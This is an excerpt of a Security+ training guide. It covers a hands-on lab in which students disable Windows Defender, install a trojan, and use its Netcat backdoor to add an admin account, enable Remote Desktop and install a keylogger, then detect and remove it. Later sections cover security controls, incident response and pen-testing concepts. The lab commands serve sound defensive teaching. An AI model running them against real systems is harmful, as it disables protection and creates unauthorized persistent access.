eth0 does not have an IPv4 (inet) address. The adapter is configured to use DHCP but
no DHCP server is currently available.
The Virtual Machine Connection window menu. Some settings can be modified while the
VM is running and you can control the VM's state using the Action menu. (Screenshot used
with permission from Offensive Security.)
In most activities, you will be reverting the VMs using this process.
e) Close the KALI on host_machine_name Virtual Machine Connection window.
3. In the activities, you will use various security appliance VMs to implement network
routing and security functions. Identify the following VMs in the Hyper-V Manager
console:
• RTx VMs—these VMs are running the VyOS distribution (http://vyos.io) and are used to
route traffic between the different subnets configured on the various virtual switches.
You will be discovering more about the network topology in later activities so you will
not explain more here.
Note: If you do want to investigate the VyOS configurations, the username is
vyos and the password is Pa$$w0rd.
Note: If you click in the window of a VyOS VM, there will be a To release your
mouse pointer press Ctrl+Alt+Left Arrow message in the status bar. This type
of VM lacks the Hyper-V integration components to manage the mouse cursor,
so you must use this key combination if you find you cannot click outside the
VM.
• PFSENSE—this is a UTM security appliance created by Netgate (https://pfsense.org)
from the OpenBSD version of UNIX. pfSense is operated using a web GUI (http://
10.1.0.254). The username is admin and the password is Pa$$w0rd
• SECONION—Security Onion (https://securityonion.net) is a network security
monitoring (NSM) tool. It provides various GUI and web interfaces to its intrusion
detection and incident monitoring tools. The username is administrator and the
password is Pa$$w0rd
4. Observe the two Linux servers that can be operated at a Linux command line:
• LAMP is built on the Ubuntu Server distribution (https://ubuntu.com) and runs the
familiar Linux, Apache, MySQL, and PHP functions of a web server. LAMP is also
installed with email and DNS servers. As a server distribution, this VM has no GUI shell.
The username is lamp and the password is Pa$$w0rd
• LX1 is a CentOS Linux distribution that has been installed with intentionally vulnerable
web services. The username is centos and the password is Pa$$w0rd
If you have booted any of the VMs to inspect them, revert them back to their initial
configuration now. In the Hyper-V Manager console, each VM should be listed as Off.
Note: If you make a mistake with a revert or shut down operation, you can
restore a snapshot by selecting the VM icon, then in the Checkpoints pane,
right-click the Initial Config checkpoint and select Apply.
Activity 1-6
Determining Malware Types
SCENARIO
In this activity, you will investigate some malware threats and the use of basic anti-
virus scanning software. This activity is designed to test your understanding of and
ability to apply content examples in the following CompTIA Security+ objectives:
• 1.1 Given a scenario, analyze indicators of compromise and determine the type of
malware.
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
• 2.3 Given a scenario, troubleshoot common security issues.
• 2.4 Given a scenario, analyze and interpret output from security technologies.
1. In the first part of this activity, you will run a setup program that has unintended
consequences. Disable anti-virus protection to illustrate the risks of not using
software that scans for malware.
a) Open a connection window for the PC1 VM.
b) If necessary, at the login screen, select Other user then, in the Username box, enter
515support\Administrator
c) In the Password box, type Pa$$w0rd and press Enter.
d) Select Start and then type powershell and press Ctrl+Shift+Enter. Select Yes to
confirm the UAC prompt.
e) Type the following command, then press Enter:
Set-MpPreference -DisableRealTimeMonitoring $True
This disables Windows Defender online scanning.
f) Close the PowerShell window.
2. Pretend that you are installing the program on the Odysseus.iso disc image,
thinking that it is a legitimate piece of software. Insert the disc image and use its
autoplay settings to start the installation.
a) In the VM connection window, select Media→DVD Drive→Insert Disk. Browse to
select C:\COMPTIA-LABS\odysseus.iso and then select Open.
b) Open File Explorer. Right-click the DVD Drive icon and select Install or run
program from your media.
A User Account Control (UAC) warning is shown because a setup.exe process is trying
to execute. The process' image file is unsigned (the publisher is listed as unknown).
c) Select See more details. Note that the install script is set to run in silent mode.
d) You would not normally proceed, but for this activity, select Yes.
e) The installer runs silently, with no visible window. Open either of the SimpleHash or
SimpleSalter shortcuts from the desktop.
f) Close the utility window.
3. The program seems to have installed two innocuous utilities, but what else might
have changed on the computer? Use Task Manager and Event Viewer to try to
identify unauthorized system changes.
a) Right-click the taskbar and select Task Manager. Select More details to view the full
interface. Inspect the list of processes. Can you spot anything unusual?
4. The Odysseus software has installed a backdoor application called Netcat on the
computer. This runs with the privileges of the logged-on user (currently
administrator) and allows a remote machine to access the command prompt on
PC1. Use the PC2 VM to run a posture assessment and see if the backdoor can be
discovered. To discover the port that the backdoor is listening on, you can use a
network scanner called Angry IP Scanner (http://angryip.org).
a) Open a connection window for the PC2 VM.
b) Press Ctrl+Alt+End to show the login page.
c) If necessary, select the Switch User button then select Other User. Log in as .\Admin
with the password Pa$$w0rd
d) Double-click the Angry IP Scanner shortcut on the desktop.
e) In the Getting Started dialog box, optionally read the help information then select
Close when you have finished.
You will scan the local subnet for hosts and see which ports they have open. Note that
the IP Range settings have automatically pre-configured to the local subnet
addresses.
f) Select the Start button to perform the scan.
g) When the scan is complete, in the Scan Statistics notification dialog box, select
Close.
h) Select Tools→Selection→Dead hosts. Press Delete.
5. To connect to the backdoor on PC1, you will use a terminal emulation client called
PuTTY (https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html).
a) Double-click the PuTTY icon on the desktop.
b) In the Host name (or IP address) box, type PC1. In the Port box, enter 4450. Set the
Connection type to Raw.
c) In the Saved Sessions box, type PC1 then select the Save button. Select Open.
d) After a few seconds, you will be connected to the command prompt on PC1. Enter the
following series of commands to establish what privileges you have. For xxxx, enter
the PID of the msmpeng.exe process (Windows Defender):
cd \windows\system32
dir
ipconfig
net user /add mal Pa$$w0rd
net localgroup administrators mal /add
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group=”Remote Desktop”
new enable=yes
tasklist
taskkill /pid xxxx
The last command fails because the process runs under the SYSTEM account. You
would need to obtain SYSTEM privileges to disable it.
e) Select Start→Remote Desktop Connection.
f) Enter the host address PC1. Select the Connect button.
g) In the Username box, enter mal and in the Password box, type Pa$$w0rd. Select OK.
h) When prompted, select Yes to trust the remote computer.
i) When prompted, select Yes to sign out the other user.
Note the warning displayed on PC1. Your "intrusion" attempt doesn't have the
advantage of any sort of stealth.
j) In the remote desktop window on PC2, when the desktop initializes, browse to the
DVD drive. Run actualkeylogger.exe then select through the warnings and the
wizard to install the program.
k) When Actual Keylogger starts, select OK to acknowledge the trial.
The full version of Actual Keylogger is available from http://actualkeylogger.com.
l) Select the Start Monitoring button then select the Hide button.
m) Select OK.
n) Restart the PC1 machine.
o) In the Putty Fatal Error message box, select OK, then close the PuTTY window.
6. Use Task Manager and the Windows Firewall with Advanced Security console to
investigate the changes that the Trojan has made. Reconfigure security settings to
block it.
a) When the PC1 VM has restarted but is still logged off, attempt to use PuTTY on the
PC2 VM to connect again (select the PC1 saved session and select Load, then Open).
This backdoor is not available because it only runs in user mode, and no user is
signed in. More powerful remote access trojans (RATs) would run at system or kernel
level, making them available even when no user is logged in.
b) Switch to the PC1 VM and sign back in as 515support\Administrator. Open Task
Manager.
c) Select the Startup tab.
Notice the entry ini has been added to the Registry by Odysseus. This entry executes
a script at logon.
d) Right-click the ini entry and select Open file location. Open ini.vbs in Notepad (right-
click and select Edit).
Note the actions that the script performs.
e) Select Start and type firewall then select the Windows Firewall icon. Select the
Advanced settings link.
f) Select the Inbound Rules node. Can you spot anything unusual?
Windows Firewall can have a bewildering number of rules configured—Has anything here
been added without authorization? (Screenshot used with permission from Microsoft.)
g) Right-click the Service Port rule, and select Disable Rule.
h) Try connecting to PC1 from PC2—it will not work.
i) On PC1, use Task Manager to close down the ncat process.
j) Use Explorer to delete the ncat.exe file and the ini file.
This Trojan is trivially easy to block and remove, but most malware is more
sophisticated.
7. Enterprise networks use centrally managed security suites to ensure that servers
and client desktops are protected against known threats more-or-less
automatically. Windows ships with a full-featured anti-virus product called
Windows Defender. Use Group Policy to ensure that Windows Defender is
enabled on all computers in the domain.
a) Select Start→Windows Administrative Tools→Group Policy Management.
b) In the navigation pane, browse to Forest: corp.515support.com→Domains→corp.
515support.com→515 Support Domain Policy. If you receive a message telling you
that changes here may have an impact on other locations, select OK.
c) Right-click 515 Support Domain Policy and select Edit.
d) In the navigation pane of the Group Policy Management Editor window, expand
Computer Configuration→Policies→Administrative Templates→Windows
Components→Windows Defender Antivirus.
e) In the detail pane, double-click Turn off Windows Defender Antivirus, read the help
text in the Turn off Windows Defender window, then select Disabled and select OK.
Note: In Group Policy, you often have to use the logic of double negatives. For
example, you want to turn on Windows Defender, but there isn’t a policy to
enable for that. So, you must disable turning Windows Defender off, which
has the same overall effect.
f) Repeat this method to set Turn off routine remediation to Disabled.
g) Expand the Real-time Protection node within Windows Defender. Set Turn off real-
time protection to Disabled.
Note: Changes made in Group Policy Editor are saved immediately, but this
can take up to two hours to roll out to all clients. Restarting the clients
(sometimes twice in a row) is one simple way to force the issue.
8. Use the Windows Defender anti-virus software to detect and neutralize malware
threats.
a) Sign back in to PC1 as 515support\Administrator.
b) Open File Explorer. Right-click the DVD Drive icon and select Install or run program
from your media. At the UAC prompt, select Yes.
c) Use the notification icon to open the Found some malware Windows Defender alert.
d) Use the Threat history node to read information about the threat discovered when
installing Odysseus.
The detected item should be identified as containing a virus of type "DOS/
Eicar_Test_File". EICAR isn't actually a virus. It's a test string that properly configured
virus scanners should detect as a virus.
e) Back in Windows Defender, under Virus & threat protection, select Scan now.
f) While the scan is running, select Virus & threat protection updates. What major
problem is found in this antivirus deployment?
The malware definitions are out of date. Definitions need to be updated at least daily.
g) Select the Back button. While the scan is running, select the Virus & threat
protection settings link. Note that the option to turn real-time protection off is
disabled. Select the Back button.
Note: Optionally, you can test the PowerShell command you used at the start
of the activity (if you open PowerShell and press the Up Arrow key, the
command will have been cached). It will not have any effect (though it doesn't
display an error).
h) If no malware is detected, open Explorer, and then right-click the DVD Drive and
select Scan with Windows Defender.
i) If threats are discovered, use the Threat history and Start actions options to
identify the additional malware and perform mitigation.
Note: You may find that Windows Defender cannot complete scanning and
becomes unresponsive. The product really needs to be updated with the latest
definitions, but you have no Internet connection available to do that.
j) Switch to PC2 and try to use PuTTY to exploit the Netcat backdoor again.
This should work, depending on the build of Windows 10 you are using. While
Defender should detect EICAR, it might not mark Netcat as malicious. It will not
remove the startup script that re-enables the backdoor firewall exception. Security
software cannot necessarily decide on its own whether a process is malicious or not.
Careful configuration, such as execution control to enforce application whitelists or
blacklists, is required.
Summary
This lesson introduced some of the basic terminology used to describe cybersecurity
threats.
• Make sure you can distinguish threat actor types and motivations.
• Be aware of what makes social engineering and phishing attacks successful.
• You should understand the uses of different kinds of malware and how infections
can be identified.
A: Answers will vary, but may include a network-based attack, because the network
gives life to a business. Many businesses today rely on networks to operate
successfully. A network-based attack can compromise daily business interactions
and can be detrimental to keeping information private and secure. This may be
even more critical for businesses that employ a wireless network. Those working
in smaller environments might be more concerned with malware, which can
easily compromise individual systems. Wireless and social networking attacks, as
well as insider threats and APT-style intrusions, might also be mentioned.
Which type of attack do you think might be the most difficult to guard against?
A: Answers will vary, but may include social engineering attacks, because the users
form an important part of an information system and they can be the first part
of the system to succumb to attacks, regardless of how resistant and well-
protected the system itself is. In addition, any organization that might be
targeted by nation state actors for any reason is probably going to list that as a
big concern.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Vulnerabilities, risks, and threats are mitigated by implementing security controls. As an
information security professional, you must be able to compare types of security controls. You
should also be able to describe how frameworks influence the selection and configuration of
controls.
Incident response is a critical security control for all organizations. A large part of your work as a
security professional will involve incident response. The skills presented in this lesson can help you
to identify, respond appropriately to, and investigate security incidents.
LESSON OBJECTIVES
In this lesson, you will:
• Compare and contrast security control and framework types.
• Follow incident response procedures.
Topic A
Compare and Contrast Security Control
and Framework Types
EXAM OBJECTIVES COVERED
3.1 Explain use cases and purpose for frameworks, best practices and secure
configuration guides.
5.7 Compare and contrast various types of controls.
In this topic, you will identify the ways that security controls are classified. By
identifying basic security control types and how other security experts use them in the
field, you will be better prepared to select and implement the most appropriate
controls for your workplace.
DEFENSE IN DEPTH
Layered security is typically seen as the best protection for systems security because
it provides defense in depth. The idea is that to fully compromise a system, the
attacker must get past multiple security controls, providing control diversity. These
layers reduce the potential attack surface and make it much more likely that an attack
will be prevented (or at least detected and then prevented by manual intervention).
Control diversity means that the layers of controls should combine different classes
of technical and administrative controls with the range of control functions (prevent,
deter, detect, correct, and compensate).
Consider the scenario where Alan from marketing is sent a USB stick containing
designs for a new billboard campaign from an agency. Without defense in depth, Alan
might find the USB stick on his desk in the morning, plug it into his laptop without
much thought, and from that point is potentially vulnerable to compromise. There are
many opportunities in this scenario for an attacker to tamper with the media: at the
agency, in the post, or at Alan's desk.
Defense in depth, established by deploying a diverse range of security controls, could
mitigate the numerous risks inherent in this scenario:
• User training (administrative control) could ensure that the media is not left
unattended on a desk and is not inserted into a computer system without scanning
it first.
• Endpoint security (technical control) on the laptop could scan the media for
malware or block access automatically.
• Security locks inserted into USB ports (physical control) on the laptop could prevent
attachment of media without requesting a key, allowing authorization checks to be
performed first.
• Permissions restricting Alan's user account (technical control) could prevent the
malware from executing successfully.
• The use of encrypted and digitally signed media (technical control) could prevent or
identify an attempt to tamper with it.
• If the laptop were compromised, intrusion detection and logging/alerting systems
(technical control) could detect and prevent the malware spreading on the network.
As well as deploying multiple types of controls, you should consider the advantages of
leveraging vendor diversity. Vendor diversity means that security controls are
sourced from multiple suppliers. A single vendor solution is a tempting choice for
many organizations, as it provides interoperability and can reduce training and
support costs. Some disadvantages could include the following:
• Not obtaining best-in-class performance—one vendor might provide an effective
firewall solution, but the bundled malware scanning is found to be less effective.
• Less complex attack surface—a single vulnerability in a supplier's code could put
multiple appliances at risk in a single vendor solution. A threat actor will be able to
identify controls and possible weaknesses more easily.
• Less innovation—dependence on a single vendor might make the organization
invest too much trust in that vendor's solutions and less willing to research and test
new approaches.
regulations. Due diligence is a legal term meaning that responsible persons have not
been negligent in discharging their duties. Negligence may create criminal and civil
liabilities. Many countries have enacted legislation that criminalizes negligence in
information management. In the US, for example, the passage of the Sarbanes-Oxley
Act (SOX) has mandated the implementation of risk assessments, internal controls,
and audit procedures. The act was introduced following several high-profile accounting
scandals, including the collapse of Enron. The Computer Security Act (1987) requires
federal agencies to develop security policies for computer systems that process
confidential information. In 2002, the Federal Information Security Management
Act (FISMA) was introduced to govern the security of data processed by federal
government agencies. FISMA compliance is audited through the risk management
framework (RMF), developed by NIST (https://nvlpubs.nist.gov/nistpubs/
SpecialPublications/NIST.SP.800-37r1.pdf). Agencies can go through a process of
Assessment & Authorization (A&A) to demonstrate compliance with the RMF.
Note: Previously, the FISMA compliance process was called Certification & Accreditation
(C&A).
There are also acts that require security standards and controls to ensure customer
privacy in particular industries, notably financial services (the Gramm–Leach–Bliley
Act [GLBA]) and healthcare (the Health Insurance Portability and Accountability
Act [HIPAA]). Finally, there are industry-enforced regulations mandating data security.
A good example is the Payment Card Industry Data Security Standard (PCI DSS)
governing processing of credit card payments.
Note: Some regulations have specific cyber-security control requirements; others simply
mandate "best practice" (as represented by a particular industry or international
framework). It may be necessary to perform mapping between different industry
frameworks (such as NIST and COBIT) if a regulator specifies the use of one but not
another. Conversely, the use of frameworks may not be mandated as such, but auditors
are likely to expect them to be in place as a demonstration of a strong and competent
security program.
PLATFORM/VENDOR-SPECIFIC GUIDES
Most vendors will provide guides, templates, and tools for configuring and validating
the deployment of network appliances, operating systems, web servers, and
application/database servers. The security configurations for each of these devices will
vary not only by vendor but by device and version as well. The vendor's support portal
will host the configuration guides (along with setup/install guides and software
downloads and updates) or they can be easily located using a web search engine.
OWASP has also developed resources, such as the Zed Attack Proxy and Webgoat (a
deliberately unsecure web application), to help investigate and understand
penetration testing and application security issues.
• Security Technical Implementation Guides (STIGs) by the Department of Defense
provide hardening guidelines for a variety of software and hardware solutions
(https://iase.disa.mil/stigs/Pages/index.aspx).
• National Checklist Program (NCP) by NIST provides checklists and benchmarks
for a variety of operating systems and applications (https://nvd.nist.gov/ncp/
repository).
• The SANS Institute (https://sans.org) is a company specializing in cybersecurity
and secure web application development training and sponsors the Global
Information Assurance Certification (GIAC). The SANS website publishes a huge
amount of research, white papers, and best practice guidance.
• The Center for Internet Security (https://cisecurity.org) is a not-for-profit
organization (founded partly by SANS). It publishes the well-known "Top 20 Critical
Security Controls" (or system design recommendations). CIS also produces
benchmarks for different aspects of cybersecurity. For example, there are
benchmarks for compliance with IT frameworks and compliance programs, such as
PCI DSS, NIST 800-53, SOX, and ISO 27000. There are also product-focused
benchmarks, such as for Windows® Desktop, Windows Server®, macOS®, Linux®,
Cisco®, web browsers, web servers, database and email servers, and VMware ESX®.
Activity 2-1
Discussing Security Control and
Framework Types
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
That the control is enforced by a procedure or policy that shapes the way
people act rather than a technical system and that the control does not prevent,
deter, or delay an attack but mitigates its impact in some way.
It would be classed as a physical control and its function is both detecting and
deterring.
Topic B
Follow Incident Response Procedures
EXAM OBJECTIVES COVERED
5.4 Given a scenario, follow incident response procedures.
Incident response is a critical security management activity and one in which you will
be regularly involved in over the course of your career. Effective incident response is
governed by formal policies and procedures, setting out roles and responsibilities for
an incident response team. You must understand the importance of following these
procedures and performing your assigned role within the team to the best of your
ability
Some organizations may prefer to outsource some of the CIRT functions to third-party
agencies by retaining an incident response provider. External agents are able to deal
more effectively with insider threats.
IBM Security Headquarters in Cambridge MA. (Image credit: John Mattern/Feature Photo Service for
IBM.)
COMMUNICATION PROCESSES
Secure communication between the trusted parties of the CIRT is essential for
managing incidents successfully. You must avoid the inadvertent release of
information beyond the team authorized to handle the incident. It is imperative that
adversaries not be alerted to detection and remediation measures about to be taken
against them. The team requires an "out-of-band" or "off-band" communication
method that cannot be intercepted. Using corporate email or VoIP runs the risk that
the adversary will be able to intercept communications. One obvious method is cell
phones but these only support voice and text messaging. For file and data exchange,
there should be a messaging system with end-to-end encryption, such as Off-the-
Record (OTR), Signal, or WhatsApp, or an external email system with message
encryption (S/MIME or PGP). These need to use digital signatures and encryption keys
from a system that is completely separate from the identity management processes of
the network being defended.
Where disclosure is required to law enforcement or regulatory authorities, this should
be made using the secure out-of-band channel.
Members of Kentucky and Alabama National and Air Guard participating in a simulated network
attack exercise. (Image © 2017 Kentucky National Guard.)
IDENTIFICATION PHASE
Identification/detection is the process of collating events and determining whether
any of them should be managed as incidents or as possible precursors to an incident;
that is, an event that makes an incident more likely to happen. There are multiple
channels by which events or precursors may be recorded:
• Using log files, error messages, IDS alerts, firewall alerts, and other resources to
establish baselines and identifying those parameters that indicate a possible
security incident.
• Comparing deviations to established metrics to recognize incidents and their
scopes.
• Manual or physical inspections of site, premises, networks, and hosts.
• Notification by an employee, customer, or supplier.
• Public reporting of new vulnerabilities or threats by a system vendor, regulator, the
media, or other outside party.
It is wise to provide for confidential reporting so that employees are not afraid to
report insider threats, such as fraud or misconduct. It may also be necessary to use an
"out-of-band" method of communication so as not to alert the intruder that his or her
attack has been detected.
Note: An employee (or ex-employee) who reports misconduct is referred to as a
whistleblower.
FIRST RESPONDER
When a suspicious event is detected, it is critical that the appropriate person on the
CIRT be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. This means
that employees at all levels of the organization must be trained to recognize and
respond appropriately to actual or suspected security incidents. A good level of
security awareness across the whole organization will reduce the incidence of false
positives and negatives. For the most serious incidents, the entire CIRT may be
involved in formulating an effective response.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 2: Comparing and Contrasting Security Controls | Topic B
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 59
CONTAINMENT PHASE
As incidents cover such a wide range of different scenarios, technologies, motivations,
and degrees of seriousness, there is no standard approach to containment or
incident isolation. Some of the many complex issues facing the CIRT are:
• What damage or theft has occurred already? How much more could be inflicted and
in what sort of time frame (loss control)?
• What countermeasures are available? What are their costs and implications?
• What actions could alert the attacker to the fact that the attack has been detected?
What evidence of the attack must be gathered and preserved?
ESCALATION
An incident may be judged too critical to continue to be managed by the first
responder. The process by which more senior staff become involved in the
management of an incident is called escalation. Escalation may also be necessary if no
response is made to an incident within a certain time frame.
suspected that customer passwords or credit card numbers have been stolen (for
instance), customers must be notified so that they can take steps to re-secure other
online accounts or financial accounts.
As well as attempting to identify the attacker, a data breach will normally require that
affected parties be notified, especially if personally identifiable information (PII) or
account security information is involved. As well as data protection legislation, many
industries have strict regulations regarding the safe processing of data and will set out
reporting requirements for notifying affected customers as well as the regulator. The
regulator will also require evidence that the systems that allowed the breach have
been improved.
• Ensure that affected parties are notified and provided with the means to remediate
their own systems. For example, if customers' passwords are stolen, they should be
advised to change the credentials for any other accounts where that password
might have been used (not good practice, but most people do it).
Activity 2-2
Discussing Incident Response
Procedures
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
2. What is a CIRT?
False—security alerts should be sent to those able to deal with them at a given
level of security awareness.
False—the first responder would be the member of the CIRT to handle the
report.
First, prevent the malware or intrusion from affecting other systems by halting
execution, stopping the system as a whole, quarantining the affected systems
from the rest of the network, and so on. Second, identify whether a data breach
has taken place and assess any requirements for escalation and notification.
Activity 2-3
Responding to an Incident
SCENARIO
Early in the work day, IT receives an increasing number of help desk tickets from
employees stating that they can't access their files. IT assumes that one of the network
file servers is down, or that the RADIUS server or clients need to be reconfigured. As
part of routine troubleshooting, one of the help desk workers checks in with the
affected employees to see what they're seeing. When he comes back, he informs you
that the issue may be more serious than originally anticipated. On the employees'
screens is a window that claims their files have been encrypted, and that if they want
to access them, they'll need to pay a fee. The help desk worker confirms that much of
the users' local files are essentially unreadable. He also confirms that the number of
affected users is continuing to grow, and that these users are all in the same
department and connected to the same subnet. Realizing that you have an incident on
your hands, you escalate the issue to your supervisor, who calls on your team to
initiate a response process. So, you'll go through each phase of incident response in
order to stop the threat and return operations to normal.
1. The first phase of the response process is preparation. What should you and
your team have done before today in order to prepare for these kinds of
incidents?
Answers may vary, but on a fundamental level, the organization should have
come up with a response strategy and incorporated that into official policy. As
part of this strategy, they should have formulated a plan for internal and
external communication during an incident; established requirements for
handling the incident; created a cyber incident response team (CIRT); ensured
that the CIRT has access to the resources it needs; and more.
2. Now that the incident is underway, you can move to the next phase:
detection and analysis. From what you know so far, what can you determine
about the nature of the incident? What is the source of the issue? How is it
propagating? What might the extent of the damage be to the business if the
issue goes unchecked?
Answers may vary. It's very likely, given what the help desk worker reported,
that the organization is the victim of ransomware that encrypts files and
demands payment in exchange for decryption. At this point, it's difficult to
establish the source of the ransomware and how it entered into the network.
However, you can be reasonably confident that this ransomware is also a worm,
and is spreading from one host to another through the network. If the spread of
this ransomware worm is not stopped, it may end up encrypting the local files
of every employee in the organization, and may even infect the network shares.
This could lead to a loss of critical data, making that data unavailable and thus
negatively impacting business operations.
3. Now that you've identified the nature of the incident, it's time to contain it.
What techniques would you suggest employing to stop the spread of the
incident, preventing it from harming the organization any further?
Answers may vary. Because the worm appears to be spreading within a single
subnet at the moment, it would be prudent to further isolate this subnet from
the rest of the network. In addition to limiting the lines of communication, you
may wish to commandeer and quarantine all of the workstations that have
been infected. This may be necessary to further ensure that the worm cannot
spread. As far as containing the infection within each workstation, if the
ransomware is still in the process of encrypting files, you could try removing
power to the device or thoroughly terminating the ransomware application and
any of its running services.
4. The threat has been contained and the infection has been removed from all
known systems and the organization is now actively monitoring other
critical systems for signs of the worm. The organization has recovered as
much data as it could, and the incident response process is coming to a
close. Before you can put this incident behind you, however, you need to
report on any lessons learned. What might you include in this report?
Answers may vary. You should summarize the incident and your response, and
include any relevant timeline information to provide the proper context. You
should also document how successful the response was, and any
improvements you might suggest for the future. You might also suggest
improvements to business operations to prevent this kind of incident from
happening again, or to at least minimize its impact. For example, if you identify
that the "patient zero" of the infection was a user who was phished into
downloading the worm, you may suggest that all personnel undergo formal end
user cybersecurity training with an emphasis on defending against social
engineering. If you identify that the worm entered your network through a flaw
in an unpatched OS or application, you may suggest a more rigorous patch
management process.
Summary
This lesson introduced the types of security controls used to protect information
systems and the frameworks that can be used to guide the selection and
implementation of controls.
• You should know how to classify security controls by type or function and
understand the use of frameworks and configuration guides in selecting
appropriate controls.
• Make sure you understand the resources that should be in place to provide
effective incident response.
• You should know the phases of incident response and typical actions associated
with them.
A: Answers will vary. Some organizations might already have a formal security
control process in place, whereas other organizations might just be developing it.
Some organizations will have a well thought out classification scheme, whereas
other organizations might find that what appeared to be a good classification
system might need to be changed.
A: Answers will vary. Some organizations might already have a formal incident
response procedure. It might be working well for the organization, or in other
cases, it might need to be modified in some manner. Using the techniques
learned in this lesson, you can provide input on modifications to existing
procedures or help create a new procedure.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Security assessment is the process of testing security controls through a comprehensive set of
techniques aimed at exposing any weaknesses or gaps in your tools, technologies, services, and
operations. The purpose of this testing is to provide you with the information you need to mitigate
any vulnerabilities in a timely and effective manner. The actual methods used in a security
assessment vary widely. These methods influence whether the test(s) are active or passive in
nature, among other characteristics.
LESSON OBJECTIVES
In this lesson, you will:
• Describe and distinguish the processes of performing vulnerability assessments and
penetration testing.
• Use software tools to identify wired and wireless network topologies and discover host OS types
and services.
• Configure and use network sniffers and protocol analyzers; and understand the uses of Remote
Access Trojans and steganography tools.
• Configure and use vulnerability scanning software; and describe the purpose of a honeypot or
honeynet.
Topic A
Explain Penetration Testing Concepts
EXAM OBJECTIVES COVERED
1.4 Explain penetration testing concepts.
5.3 Explain risk management processes and concepts.
As a security professional, you will often need to participate in various types of security
posture assessments. While you may not be devising or managing these assessments,
you should be able to explain the principles that govern the selection and conduct of a
particular type of security test.
VULNERABILITY SCANNING
Vulnerability scanning is the process of auditing a network (or application) for known
vulnerabilities. Recall that a vulnerability is a weakness that could be triggered
accidentally or exploited maliciously by a threat actor to cause a security breach. An
unpatched software application, a host with no anti-virus software, and an
administrator account with a weak password are examples of vulnerabilities.
Vulnerability scanning generally uses passive reconnaissance techniques. A
vulnerability scanner would probe the network or application to try to discover issues
but would not attempt to exploit any vulnerabilities found. Performing Open Source
Intelligence (OSINT) searches represents another type of passive reconnaissance.
Issues reported by a vulnerability scan performed by Greenbone OpenVAS as installed on Kali Linux.
(Screenshot used with permission from Greenbone Networks, http://www.openvas.org.)
PENETRATION TESTING
A penetration test (pen test) or ethical hacking essentially involves thinking like an
attacker and trying to penetrate the target's security systems. A pen test might involve
the following steps:
• Verify a threat exists—use surveillance, social engineering, network scanners, and
vulnerability assessment tools to identify vulnerabilities that could be exploited.
• Bypass security controls—look for easy ways to attack the system. For example, if
the network is strongly protected by a firewall, is it possible to gain physical access
to a computer in the building and run malware from a USB stick?
• Actively test security controls—probe controls for configuration weaknesses and
errors, such as weak passwords or software vulnerabilities.
• Exploit vulnerabilities—prove that a vulnerability is high risk by exploiting it to gain
access to data or install malware.
The key difference from passive vulnerability scanning is that an attempt is made to
actively test security controls and exploit any vulnerabilities discovered. Pen testing is
an active reconnaissance technique. For example, a vulnerability scan may reveal that
an SQL Server has not been patched to safeguard against a known exploit. A
penetration test would attempt to use the exploit to perform code injection and
compromise and "own" (or "pwn" in hacker idiom) the server. This provides active
testing of security controls. For example, even though the potential for the exploit
exists, in practice the permissions on the server might prevent an attacker from using
it. This would not be identified by a vulnerability scan, but should be proven or not
proven to be the case by penetration testing.
Note: http://sectools.org is a useful resource for researching the different types and
uses of security assessment tools.
RULES OF ENGAGEMENT
Security assessments might be performed by employees or may be contracted to
consultants or other third parties. Ground rules for any type of security assessment
should be made explicit in a contractual agreement and backed by senior
management. These guidelines also apply to assessments performed by employees.
Some things to consider are:
• Whether to use "No holds barred" or "smash and grab" testing—if agreed, the
consultant will try to use any means to penetrate as far into the network and
information systems as possible. Alternatively, rules can be agreed to circumscribe
this freedom to act to protect data assets and system integrity.
• Whether to stop at the perimeter—having demonstrated that a vulnerability exists
at the network edge, the consultant will stop and not attempt to exploit the breach
or view confidential data.
• Attack profile—attacks come from different sources and motivations. You may wish
to test both resistance to external (targeted and untargeted) and insider threats.
You need to determine how much information about the network to provide to the
consultant:
• Black box (or blind)—the consultant is given no privileged information about the
network and its security systems. This type of test would require the tester to
perform the reconnaissance phase. Black box tests are useful for simulating the
behavior of an external threat.
• White box (or full disclosure)—the consultant is given complete access to
information about the network. This type of test is sometimes conducted as a
follow-up to a black box test to fully evaluate flaws discovered during the black
box test. The tester skips the reconnaissance phase in this type of test. White
box tests are useful for simulating the behavior of a privileged insider threat.
• Gray box—the consultant is given some information; typically, this would
resemble the knowledge of junior or non-IT staff to model particular types of
insider threats. This type of test requires partial reconnaissance on the part of
the tester. Gray box tests are useful for simulating the behavior of an
unprivileged insider threat.
• Test system or production environment—ideally, tests would be performed in a
sandbox environment that accurately simulates the production environment.
However, this is expensive to set up. It may be very difficult to create a true replica,
so potential vulnerabilities may be missed. Using the production environment risks
service outages and data loss, especially with the "no holds barred" approach.
Note: Both vulnerability assessments and penetration testing can be disruptive to a
network. Passive types of scanning software generate a large amount of network
traffic and perform "port enumeration" against devices such as servers and routers.
This can overload the network and cause devices to crash. Exploit modules can self-
evidently crash a network and may even damage data, if performed carelessly.
• Out of hours—whether the consultant should only perform testing out of hours to
avoid causing problems on a production network. The problem here is that network
policies and intrusion detection systems are generally configured to view out of
hours access as suspicious, so the penetration testing is not taking place in the
network's "real world" state.
• Full disclosure of test results to the company in a timely manner. The report should
also contain recommendations for remediating vulnerabilities.
• Confidentiality and non-disclosure (to third parties) by the consultant.
INITIAL EXPLOITATION
In the initial exploitation phase (also referred to as weaponization), an exploit is
used to gain some sort of access to the target's network. This initial exploitation might
be accomplished using a phishing email and payload or by obtaining credentials via
social engineering.
PERSISTENCE
Persistence refers to the tester's ability to reconnect to the compromised host and
